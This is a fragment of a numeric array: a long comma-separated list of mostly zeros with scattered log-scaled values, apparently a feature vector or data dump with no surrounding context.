0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.1972245773362196, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.8903717578961645, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.0794415416798357,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.3978952727983707, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.295836866004329, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 6.028278520230698, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0.0, 0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 8.266085260861173, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.8971538676367405, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 2.3978952727983707, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.465908118654584, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 7.475339236566737, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 7.052721049232323, 0.0, 0.0, 0, 0, 3.93848385770662, 0.0, 0, 0.0, \n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 1.3862943611198906, 0.0, \n 3.5553480614894135, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.828641396489095, \n 0.0, 4.74493212836325, 0.0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 5.95562797505323, 0.0, 0, 0.0, \n 11.851968999389458, 0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 2.9444389791664403, 0.0, 1.9459101490553132, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 4.356708826689592, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, \n 3.4011973816621555, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9384838577066197, 0, 0.0,\n 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 8.908694592507015, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 3.828641396489095, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 2.70805020110221, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.3322045101752034, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 18.568604526672758, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 13.031161839818749, 0.0, 0.0, 12.949565591960841, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 10.626454784082686, 0.0, 0.0, 0.0, 5.346437018291705, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.278114659230517, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 7.052721049232323, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 6.028278520230698, 0.0, 0.0, 0.0, 0.0, 2.833213344056216,\n 0.0, 6.5998704992128365, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 